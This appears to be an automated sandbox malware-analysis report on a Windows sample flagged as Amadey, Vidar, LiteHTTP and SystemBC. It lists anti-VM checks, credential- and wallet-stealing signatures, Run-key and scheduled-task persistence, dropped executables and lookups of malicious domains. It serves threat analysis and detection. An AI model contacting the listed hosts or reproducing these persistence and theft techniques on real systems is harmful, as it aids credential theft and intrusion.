Malware Analysis Report

2025-04-03 09:16

Sample ID 250306-bwnkgat1dz
Target bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e
SHA256 bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e
Tags
defense_evasion discovery spyware stealer amadey litehttp systembc vidar 092155 ir7am bot credential_access execution persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e

Threat Level: Known bad

The file bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery spyware stealer amadey litehttp systembc vidar 092155 ir7am bot credential_access execution persistence trojan

SystemBC

Systembc family

Litehttp family

Amadey

Vidar family

Vidar

Detect Vidar Stealer

LiteHTTP

Amadey family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Blocklisted process makes network request

Downloads MZ/PE file

Reads data files stored by FTP clients

.NET Reactor proctector

Drops startup file

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Unsecured Credentials: Credentials In Files

Reads user/profile data of local email clients

Checks BIOS information in registry

Identifies Wine through registry keys

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Browser Information Discovery

System Location Discovery: System Language Discovery

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 01:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 01:29

Reported

2025-03-06 01:32

Platform

win7-20241023-en

Max time kernel

119s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 1216

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp

Files

memory/2712-0-0x00000000000E0000-0x00000000003FA000-memory.dmp

memory/2712-1-0x00000000771C0000-0x00000000771C2000-memory.dmp

memory/2712-3-0x00000000000E0000-0x00000000003FA000-memory.dmp

memory/2712-2-0x00000000000E1000-0x0000000000141000-memory.dmp

memory/2712-4-0x00000000000E0000-0x00000000003FA000-memory.dmp

memory/2712-5-0x00000000000E0000-0x00000000003FA000-memory.dmp

memory/2712-6-0x00000000000E0000-0x00000000003FA000-memory.dmp

memory/2712-7-0x00000000000E1000-0x0000000000141000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 01:29

Reported

2025-03-06 01:32

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\bxagwdt\nharnrr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\bxagwdt\nharnrr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\bxagwdt\nharnrr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\bxagwdt\nharnrr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108880101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\ProgramData\bxagwdt\nharnrr.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\xmXCfoJJ\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\240adb43ac.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\240adb43ac.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Z3O3F86JTR4WB47OW.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\240adb43ac.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108880101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempDOCRR6GVSRO5TP7833AJ47MPPWB8SWEE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe N/A
